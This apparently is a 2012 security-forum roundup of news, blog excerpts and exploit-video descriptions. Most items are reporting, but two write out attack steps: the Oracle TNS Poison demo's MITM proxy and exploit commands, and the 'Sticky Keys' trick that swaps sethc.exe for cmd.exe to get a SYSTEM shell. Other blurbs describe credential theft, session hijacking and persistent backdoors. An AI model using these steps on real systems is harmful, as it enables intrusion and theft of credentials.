Nytro

[h=3]Security Week In Review, April 23-27[/h] Infections and exploits plagued this week in security, affecting everything from the Mac OS X to Oracle database servers. High profile leaks and a passage of a controversial information sharing bill also graced the security landscape. Here’s a look at April 23-27. VMware Source Code Leaked: Last week, VMware confirmed an attack that led to the online publication of source code for its ESX hypervisor and said that more could be on the way. The individual stepping up to take credit for the attack was a hacker going by the handle of Hardcore Charlie, who also claimed responsibility for another hack on military contractor China National Import & Export Corp earlier this month. “The fact that the source code may have been publicly shared does not necessarily mean that there is any increased risk to VMware customers. VMware proactively shares its source code and interfaces with other industry participants to enable the broad virtualization ecosystem today,” said Iain Mulholland director of the VMware Security Response Center, in a blog post. Hardcore Charlie also tweeted that he possessed EMC source code, which he said he also planned to post. Microsoft Fixes Hotmail Password Flaw: Redmond patched a password reset vulnerability in its Hotmail Web mail service last week that potentially exposed its more than 360 million users to account compromises. Specifically, the glitch enabled miscreants with a Firefox add-on to circumvent security restrictions and remotely reset the password of a Hotmail account by modifying the data, while also enabling them to decode CAPTCHA and send automated values over the MSL Live Hotmail module. When the reset button was hit, hackers could then manipulate the requests and put in their own reset information. Luckily for Hotmail’s 360 million users, the bug was discovered and repaired in a relatively short window of time. Microsoft got wind of the vulnerability April 20 and issued a fixed the following day. The fix went public at the end of last week. House Passes CISPA Bill: The controversial Cyber Information Sharing and Protection Act passed in the House of Representatives by a vote of 248 to 168 at the end of last week, despite a strong public backlash from privacy advocates and academia who asserted that the move violated privacy rights. Specifically, the bill, supported by firms such as Facebook, financial trade associations, AT&T, utilities, Intel, and several tech companies, among others, gives the federal government a lot of leeway to share classified cyber threat information with U.S. companies. The bill also simultaneously eliminates many restrictions to information sharing between organizations. The bill’s chief supporter and architect Mike Rogers applauded the legislation as a move in the right direction toward the comprehensive protection of U.S. networks against cyber spies and thieves from Russia and China. However, CISPA’s opponents, including the Center for Democracy and Technology, as well as the ACLU, called the bill ‘overly broad’ and contended that it would serve to erode users’ Internet freedoms and privacy. Oracle Suffers Critical Glitch: A critical vulnerability enabling remote code execution in all versions of the Oracle database server remains unpatched even after Oracle attempted to fix the flaw with its April Critical Patch Update, according to reports circulating last week. Specifically, the vulnerability, occurring in the TNS Listener service, a function which routes connection requests from clients to the server, allows attackers to intercept server traffic and execute malicious commands on the system. The vulnerability exists in all Oracle versions, affecting customers using 8i, 9i, 10g, and 11g (11g R2). If exploited, a remote attacker has complete control of the data exchanged between the server database and the client machines, which paves the way for miscreants to hijack users’ sessions and inject code to do their malicious bidding. Oracle recently patched the flaw TNS Listener service in its April update. However it turns out that the fix didn’t apply to current versions of the Oracle database, leaving many customers subject to arbitrary attacks aiming to exploit the vulnerability. New Flashback Variant Attack Macs: Yet another Flashback variant was discovered sweeping through users’ Mac OS X machines last week. This time, Mac security firm Intego reported the pesky Mac malware installs on users’ computers without requiring a password. The latest Flashback version, known as Flashback.S, inserts itself in one of the user’s home folders that include ~/Library/LaunchAgents/com.java.update.plist or ~/.jupdate. Once it has completely installed itself, the malware then deletes all files and folders in ~/Library/Caches/Java/cache in order to eliminate the applet from the infected Mac, and avoid detection or sample recovery, according to Intego. The Mac-focused Flashback Trojan was first discovered in September 2011, impersonating a bogus Adobe Flash Player installer. The malware has since gone on a rampage against the Mac OS X platform with numerous variants that have exploited a slew of Java vulnerabilities, ultimately infecting as many as 650,000 machines, according to reports. by Stefanie Hoffman | April 30, 2012 at 5:05 pm Sursa: Security Week In Review, April 23-27 | Fortinet Security Blog

[h=1]CVE-2012-1675 Oracle Database TNS Poison 0Day Video Demonstration[/h] [h=4]Timeline :[/h] Vulnerability discovered by Joxean Koret in 2008 Vulberability reported to the vendor by Joxean Koret in 2008 Public release of the vulnerability in Oracle CPU by the vendor the 2012-04-17 Details and PoC of the vulnerability released by Joxean Koret the 2012-04-18 Fake patching of the vulnerability discovered by Joxean Koret the 2012-04-26 [h=4]PoC provided by :[/h] Joxean Koret [h=4]Reference(s) :[/h] Oracle CPU of April 2012 Joxean Koret details and PoC CVE-2012-1675 Oracle Security Alert for CVE-2012-1675 [h=4]Affected version(s) :[/h] All versions of Oracle Database [h=4]Tested with :[/h] Oracle Database 10g Enterprise Edition Release 10.2.0.4.0 [h=4]Description :[/h] Usage of Joxean Koret PoC require that the database name has a length of 6 characters. Database server characteristics : IP : 192.168.178.150 Oracle version : 10.2.0.4.0 Database listener port : 1521 Database listener has no clients IPs restrictions Database name : arcsig Database username : arcsig Database password : testtest Database client characteristics : IP : 192.168.178.151 SQL*Plus version : 10.2.0.4.0 “tnsnames.ora” file as bellow : TARGET.DB= (DESCRIPTION = (ADDRESS = (PROTOCOL = TCP)(HOST = 192.168.178.150)(PORT = 1521)) (CONNECT_DATA = (SERVICE_NAME= arcsig) ) ) Attacker characteristics : IP : 192.168.178.100 Usage of PoC provided by Joxean Koret [h=4]Demonstration :[/h] PoC validation phase On database server : ifconfig ps faux netstat -tan On database client : ifconfig sqlplus -v cat tnsnames.ora sqlplus arcsig@TARGET.DB HELP QUIT PoC exploitation phase On attacker : Start the MITM proxy, how will intercept the communication between the client and the database : sudo python proxy.py -l 192.168.178.100 -p 1521 -r 192.168.178.150 -P 1521 Start the vulnerability exploitation : python tnspoisonv1.py 192.168.178.100 1521 arcsig 192.168.178.150 1521 On the database client : Connect with SQL*Plus sqlplus arcsig@TARGET.DB ? ? INDEX TOTO QUIT You can see that the communication are intercepted by the proxy. Sursa: CVE-2012-1675 Oracle Database TNS Poison 0Day Video Demonstration

[h=3]Facebook source code hacker explains,what really happened ![/h] Software development student Glenn Mangham, 26, was freed earlier this month after appeal judges halved the eight-month prison sentence he was given for infiltrating and nearly bringing down the multi-million-dollar site. Glenn Mangham, of York, England, posted a lengthy writeup on his blog and a video, saying that he accepts full responsibility for his actions and that he did not think through the potential ramifications. "Strictly speaking what I did broke the law because at the time and subsequently it was not authorised," Mangham wrote. "I was working under the premise that sometimes it is better to seek forgiveness than to ask permission." Initially convicted to 8 months in prison, the Court of Appeal in London decided that there weren’t any ill intentions on the hacker’s behalf, the judges deciding not only to release him, but also to allow him to use the Internet once again. After criticizing the CSO for attacking him while he was locked up, Mangham explained in detail why he took the Facebook source code, why he didn’t use any proxies to cover up his tracks and he even revealed the exact amount of damage he believed his actions had caused. http://www.youtube.com/watch?v=emzOZH1-v9E&feature=player_embedded

Linux Memory Images We make these sample Linux memory images available in the hope they may be useful for research, training, testing, or other purposes. If you find them to be of value, please drop us a line via the contact form on this web site. hem to be of value, please drop us a line via the contact form on this web site. [TABLE] [TR] [TH]Filename[/TH] [TH]Size[/TH] [TH]Hash[/TH] [TH]Description[/TH] [TH]BitTorrent Download[/TH] [/TR] [TR=class: alt] [TD]centos-5.6-i386-kbeast.mem.bz2[/TD] [TD]705266494 bytes (673MB)[/TD] [TD]sha256sum[/TD] [TD]This is a bzip2-compressed memory image taken from a VirtualBox VM allocated 2GB RAM, running from a CentOS 5.6 LiveCD, infected with the kbeast rootkit. Memory was acquired via the VirtualBox dumpguestcore command, as described here.[/TD] [TD]Magnet Link[/TD] [/TR] [TR] [TD]ubuntu-10.04-i386-kbeast.mem.bz2[/TD] [TD]480042093 bytes (458MB)[/TD] [TD]sha256sum[/TD] [TD]This is a bzip2-compressed memory image taken from a VirtualBox VM allocated 1GB RAM, running from an Ubuntu 10.04.3 LiveCD, infected with the kbeast rootkit. Memory was acquired via the VirtualBox dumpguestcore command, as described here.[/TD] [TD]Magnet Link[/TD] [/TR] [/TABLE] Sursa: Second Look

[h=3]An interesting case of Mac OSX malware[/h] msft-mmpc 30 Apr 2012 4:20 PM In June 2009, Microsoft issued security update MS09-027, which fixed a remote code execution vulnerability in the Mac version of Microsoft Office. Despite the availability of the bulletin (and the passage of time), not every machine is up to date yet – which is how nearly three years later, malware has emerged that exploits the issue on machines running Office on Mac OS X. Fortunately, our data indicates that this malware is not widespread, but during our investigation we found a few interesting facts we’d like to share with you. For our investigation, we used a malware sample (SHA1: 445959611bc2480357057664bb597c803a349386) that is detected as Exploit:MacOS_X/MS09-027.A. Figure 1 - Overall Execution Flow Firstly, the vulnerability is a stack-based buffer overflow - the attack code could corrupt variables and return addresses located on the stack. As we analyzed the malware, we found that the malware author managed to corrupt a local variable and used that corrupted variable to deploy 'stage 1' shellcode to a designated area. This corrupted variable is later used for a target address and is where the stage 1 shellcode is copied. The corrupted return address points to this target address as well. This target address is important, as, with Snow Leopard, we could confirm that it was used to exploit a specific location on the heap that is writable and also executable. The point is, that with Lion, that specific memory address can't be written, so the exploit fails. We can assume that this malware itself is targeting only Snow Leopard or lower versions of Mac OSX. That means the attacker had knowledge about the target environment beforehand. That includes the target operating system, application patch levels, etc. Figure 2 Stage 1 Shellcode This stage 1 shellcode leads to stage 2 shellcode, which is located in memory. The stage 2 shellcode is actually where the infection of the system occurs. The stage 2 shellcode creates three files: /tmp/launch-hs /tmp/launch-hse /tmp/file.doc Figure 3 File Creation by Stage 2 Shellcode As you can see from the above picture, the exploit attack code uses typical Unix style shellcode to run system calls. So far, this is nothing new. Later in the shellcode, the file "/tmp/launch-hs" is executed by a system call to "execve" to execute commands. The contents of "/tmp/launch-hs" should be a shell script or executable. Figure 4 Execution of /tmp/launch-hs script file We looked into the the contents of the "/tmp/launch-hs", and it appears like following: Figure 5 /tmp/launch-hs script contents It is just a tiny shell script that runs "/tmp/launch-hs" and and opens "/tmp/file.doc". The file "/tmp/launch-hse" should be the main binary that contains all the malicious code. Also "/tmp/file.doc" is a fake document file that will be displayed to the user to deceive the user from seeing any abnormalities or malicious symptoms. The main payload file is "/tmp/launch-hse" - it is a Mach-O format, or standard executable format, for Mac OSX. This binary a command and control (C&C) agent that communicates with a C&C server (master) to perform unauthorized actions that are similar to other C&C bot clients. The function names give clues that might indicate that this binary is connecting to a C&C server, parses command from it and performs file retrieval or creates process. Figure 6 Peek into the function names gives you an idea. The main difference about this malware is that it is written for Mac OSX. For example, if you look into a "RunFile" function, which runs a command on the infected machine, you can see that it's a Mac OSX version of backdoor. Basically it runs a command supplied from the C&C server. Figure 7 RunFile function In conclusion, we can see that Mac OSX is not safe from malware. Statistically speaking, as this operating system gains in consumer usage, attacks on the platform will increase. Exploiting Mac OSX is not much different from other operating systems. Even though Mac OSX has introduced many mitigation technologies to reduce risk, your protection against security vulnerabilities has a direct correllation with updating installed applications. If you're using Microsoft Office 2004 for Mac, Microsoft Office 2008 for Mac or Open XML File Format Converter for Mac, be sure to update using the latest product updates. For this specific vulnerability, you can visit the Microsoft Security Bulletin MS09-027 page and download the update. Jeong Wook (Matt) Oh MMPC Sursa: An interesting case of Mac OSX malware - Microsoft Malware Protection Center - Site Home - TechNet Blogs

SIP home gateways under fire The SIP home gateway -- which combines a NAT router, a SIP proxy, and analogue phone adapters -- is the weakest link in a Voice over IP network. SIP's numerous source routing mechanisms share the well-known security weaknesses of IP source routing. The talk discusses possible exploits and countermeasures. Telephony is steadily moving to Voice over IP, opening up a world of hacking opportunities. While many security issues have long been addressed in standardization, real-world VoIP suffers from incomplete and sometimes broken implementations. SIP home gateways -- which combine a NAT router, a SIP proxy, and a phone adapter are especially at risk. The predominant VoIP protocol SIP (Session Initiation Protocol) has been designed as an -- almost -- stateless protocol. The network elements responsible for call routing only keep very little and short-lived state. This makes SIP highly scalable and substantially simplifies fail-over. To achieve this, SIP uses source routing mechanisms extensively. Due to its security weaknesses, the network layer protocols have long abandoned the idea of source routing, despite its theoretical appeal. Some IP source routing attacks and countermeasures can be applied to SIP. [TABLE=class: datatable] [TR] [TD=class: highlight]Authors[/TD] [TD=class: lowlight] Wolfgang Beck [/TD] [/TR] [TR] [TD=class: highlight]Submitted[/TD] [TD=class: lowlight]May 01, 2012[/TD] [/TR] [/TABLE] Download: [/B]http://mirror.fem-net.de/CCC/27C3/mp3-audio-only/27c3-4181-en-sip_home_gateways_under_fire.mp3[B] Sursa: IT Security and Hacking knowledge base - SecDocs

Terrorists Win - Exploiting Telecommunications Data Retention Telecommunications data retention (TDR) has become a reality in most Western countries. Protagonists claim that the collection of massive amounts of data on the communication behavior of all individuals within a country would enable law enforcement agencies to exploit patterns in the stored data to uncover connections between suspects. While this is obviously true for investigations after an incident happened, there is up to now no critical and sound assessment publicly available that evaluates whether TDR brings any pro-active benefits for the above mentioned, justified purposes. In this talk we give for the first time a critical assessment of the power of TDR based on methods from information theory. To this end we have employed agent based simulations, which mimic the communication behavior of a large community including a dark-net of alleged suspects. The structure and statistics of our telecommunication simulation, which drive the dynamics of telephone calls and simulated TDR data, were generated according to known statistics of real-world telecommunications networks. Hiding in the unavoidable noise seems to be a passive strategy for terrorists to circumvent pro-active detection. This stems from a "needle in the haystack"-problem, that arises due to the small number of conspirators compared to the number of other participants. In particular situations and with adopted strategies suspected terrorists might be able to eventually exploit TDR for their purposes and take an active approach to hiding in the crowd. Such TDR exploits would lower the probability of detection by law enforcement agencies and render TDR a potential security threat. Again, we use our simulations and our analysis procedure to assess this problem. Authors Kay Hamacher Stefan Katzenbeisser Submitted May 01, 2012 Download: http://mirror.fem-net.de/CCC/27C3/mp4-h264-HQ/27c3-4055-en-terrorists_win_exploiting_telecommunications_data.mp4 Sursa: IT Security and Hacking knowledge base - SecDocs

Windows 8 Forensic Guide Download: http://propellerheadforensics.files.wordpress.com/2012/04/thomson_windows-8-forensic-guide.pdf

[h=1]SyScan 2012 Singapore[/h] Parent Directory Day1-1 Chris Valasek & Tarjei Mandt/ Day1-2 Loukas Kalenderidis/ Day1-3 Ryan MacArhur & Beist/ Day1-4 Aaron LeMasters/ Day1-5 James Burton/ Day1-6 Jon Oberheide/ Day2-10 Edgar Barbosa/ Day2-6 Alex Ionescu/ Day2-7 Stefan Esser/ Day2-8 Brett Moore/ Day2-9 Paul Craig/ Slides: http://www.xchg.info/ARTeam/conferences/SyScan%202012%20Singapore/

[h=1]Skype-iplookup[/h] Perform obscure ip lookup for online skype accounts. Can find local and remote ip address. Require craked SkypeKit with deobfuscated debug logs. Online: http://skype-ip-finder.tk/ Source code: https://github.com/zhovner/Skype-iplookup

[h=3]Announcing SSL Pulse[/h] [h=2]April 30, 2012[/h] Last week we announced SSL Pulse, a continuously updated dashboard that is designed to show the state of the SSL ecosystem at a glance. While it is possible today to deploy SSL and to deploy it well, the process is difficult: the default settings are wrong, the documentation is lacking, and the diagnostic tools are inadequate. For these reasons, we cannot say that the Web is yet secure, but we hope that someday it will be. The purpose of SSL Pulse is to bring visibility to SSL implementation issues on the Web, and while businesses are starting to fix these issues we can keep track of progress made towards making SSL more robust and widely adopted on the Internet. SSL Pulse is based on the assessment technology and testing conducted by SSL Labs. The underlying data set draws from the information on about 200,000 SSL web sites that represent the most popular web sites in the world. We cherry-picked only the most important data points, focusing especially on those aspects where improvements are needed. We have so far conducted only one round of testing, but, when the next month’s results become available, we will start to show historic values and hopefully see improvements for each data point. So what do the results tell us? Looking at the SSL Labs grades, which are designed to sum up the quality of SSL configuration, we can see that about 50% (99,903 sites) got an A, which is a good result. Previous global SSL Labs surveys reported about 33% well-configured sites, which means that more popular sites are better configured. Unfortunately, many of these A-grade sites (still) support insecure renegotiation (8,522 sites, or 8.5% of the well-configured ones) or are vulnerable to the BEAST attack (72,357 sites, or 72.4% of the well-configured ones). This leaves us with only 19,024 sites (or 9.59% of all sites) that are genuinely secure at this level of analysis. The number of sites vulnerable to insecure renegotiation is decreasing at a steady pace, as patches are applied or servers get replaced. The very high number of sites vulnerable to the BEAST attack is worrying, because this problem needs to be addressed in configuration, and that requires awareness, time, and knowledge. Plus, freshly installed systems are equally likely to be vulnerable because of the insecure defaults. Among other interesting data points, we found only 19 weak private keys in our data. There are also 9 keys that trigger our black list of weak Debian keys. The support for HTTP Strict Transport Security, which is the state of the art configuration for SSL, is at 0.85% (1,697 sites). As part of this effort, we also published an SSL/TLS Deployment Best Practices guide with clear and concise instructions to help overworked administrators and programmers spend the minimum time possible to deploy a secure site or web application. Posted by Ivan Risti? at 16:36:44 in SSL, TIM Sursa: Ivan Risti?: Announcing SSL Pulse

[h=1]Oracle discloses new zero day exploit and launches JDK for OS X[/h]by Chester Wisniewski on May 1, 2012 While some might find it amusing that a company accidentally disclosed a zero day vulnerability in its own software, you won't if you are a Oracle database administrator. Earlier this month Oracle released a "critical patch update" fixing 88 vulnerabilities in its wide assortment of database products. Unfortunately one of the fixes for its TNS Listener service had stability issues and is only going to be fixed in future versions. Still Oracle saw fit to say it was fixed, even though they have no intention of releasing a patch for it and all current versions remain vulnerable. This sounds bad enough, but it gets worse. Joxean Koret, who discovered and disclosed the vulnerability to Oracle in 2008 saw the notice that the flaw was fixed and published a proof-of-concept exploit to the Full Disclosure mailing list. Oracle isn't exactly known for getting security right, but this is downright reckless. Taking four years to fix a serious vulnerability, and even then only committing that future releases, to be named, will fix it? If you are responsible for securing Oracle DBs I would highly recommend creating extremely restrictive firewall rules for the TNS Listener service, or disable it entirely if it isn't needed in your environment. In other Oracle news, the Java JDK is now available for OS X Lion (10.7). For Java neophytes, this is not the Java Plugin/Java Web Start components that integrate with your browser to allow you to launch Java applets. It only works with 64 bit versions of Lion and is intended for development use. Earlier versions of OS X will not see a port coming from Oracle either. This might be an indication that Oracle intends to supply their own JRE/Java Plugin/Web Start for Mac users in the future, which would make it easier for OS X users to stay current without relying on Apple. Update: At approximately the same time as this article was posted Oracle released a critical update for versions 10g and 11g database products fixing this vulnerability. Sometimes light is the best disinfectant. Sursa: Oracle discloses new zero day exploit and launches JDK for OS X | Naked Security

[h=3]Privilege Escalation via "Sticky" Keys[/h] [h=2]Monday, April 30, 2012[/h] This has been documented all over, but i like things to be on the blog so i can find them... You can gain a SYSTEM shell on an application you have administrative access on or if you have physical access to the box and can boot to repair disk or linux distro and can change files. make a copy somewhere of the original on system sethc.exe copy c:\windows\system32\sethc.exe c:\ cp /mnt/sda3/Windows/System32/sethc.exe /mnt/sda3/sethc.exe copy cmd.exe into sethc.exe's place copy /y c:\windows\system32\cmd.exe c:\windows\system32\sethc.exe or cp /mnt/sda3/Windows/System32/cmd.exe /mnt/sda3/Windows/System32/sethc.exe Reboot, hit Shift key 5 times, SYSTEM shell will pop up, do your thing it would probably be nice to sethc.exe back when you are done. Posted by CG at 12:10 PM Sursa: Carnal0wnage & Attack Research Blog: Privilege Escalation via "Sticky" Keys

[h=4]Arp/Dns Spoofing Steal Facebook Password (Lan Environment)[/h] Description: In this video i'll show you how an attacker can steal user credentials of every site (in this case will be facebook) in a LAN environment. First of all we use SET to clone the current facebook home page and ... Security Obscurity Blog: ARP/DNS Spoofing Steal Facebook Password (LAN Environment) Follow Me: https://twitter.com/#!/SecObscurity Sursa: Arp/Dns Spoofing Steal Facebook Password (Lan Environment)

[h=4]Stealing Http Sessions With Sessionlist[/h] Description: I run through a quick demo of how to use sessionlist to sniff http session traffic. Following that I use a simple firefox plugin to spoof the data acquired to show full access to the logged in user. Target demo site is facebook.com Download:

[h=4]Ms12-020 -- Critical Vulnerability To Attack On Windows 2008 Enterprise Edition.[/h] Description: The vulnerability in Microsoft's Remote Desktop Protocol (RDP) implementation (MS12-020). Victim :- windows server 2006 x86 Enterprise Edition Sursa: Ms12-020 -- Critical Vulnerability To Attack On Windows 2008 Enterprise Edition.

[h=4]Athcon 2011 Exploiting Anti-Reversing Techniques[/h] Description: AthCon IT Security Conference Title: Exploiting Anti-Reversing Techniques: Attacking Armadillo's Loader under Xenocode Application Virtualization. Speaker: Kyriakos Economou Sursa: Athcon 2011 Exploiting Anti-Reversing Techniques

[h=4]Athcon 2011 Win32 Exploit Development With Pvefindaddr + Project Quebec[/h] Description: Athcon IT Security Conference Title: Win32 Exploit Development with pvefindaddr + Project Quebec Speaker: Peter Van Eeckhoutte Sursa: Athcon 2011 Win32 Exploit Development With Pvefindaddr + Project Quebec

[h=4]Athcon 2010 "Attacking Voip And Understanding What Cyber-Crime Is Doing"[/h] Description: "Attacking VoIP and understanding what cyber-crime is doing" Sursa: Athcon 2010 "Attacking Voip And Understanding What Cyber-Crime Is Doing"

[h=4]Athcon 2010 "The Dhcp Recession: Extended Dhcp Exhausting Attack"[/h] Description: "The DHCP Recession: Extended DHCP Exhausting attack" Sursa: Athcon 2010 "The Dhcp Recession: Extended Dhcp Exhausting Attack"

[h=4]Athcon 2010 Mobile Privacy: Tor On The Iphone And Other Unusual Devices[/h] Description: Mobile privacy: Tor on the iPhone and other unusual devices Sursa: Athcon 2010 Mobile Privacy: Tor On The Iphone And Other Unusual Devices"

[h=4]Microsoft Windows Eot Font Table Directory Integer Overflow.[/h] Description: This module exploits an integer overflow flaw in the Microsoft Windows Embedded OpenType font parsing code located in win32k.sys. Since the kernel itself parses embedded web fonts, it is possible to trigger a BSoD from a normal web page when viewed with Internet Explorer. Sursa: Microsoft Windows Eot Font Table Directory Integer Overflow.

[h=4]Intersect Framework :: Install Persistent Backdoors[/h] Description: This video demonstrates how to use the Intersect 'persistent' module to install or remove a persistent backdoor. This backdoor can be used with any of the Intersect shell modules, will survive reboots and can only be removed by using your custom Intersect script (not even root users can modify or delete the backdoor files). Intersect homepage: http://github.com/ohdae/Intersect-2.5/ Sursa: Intersect Framework :: Install Persistent Backdoors

[h=4]Social Engineer-Toolkit And Windows Credentials Editor[/h] Description: Using SET & WCE to pull passwords off a fully patched Windows 7 box running MSE. @fjhackett Sursa: Social Engineer-Toolkit And Windows Credentials Editor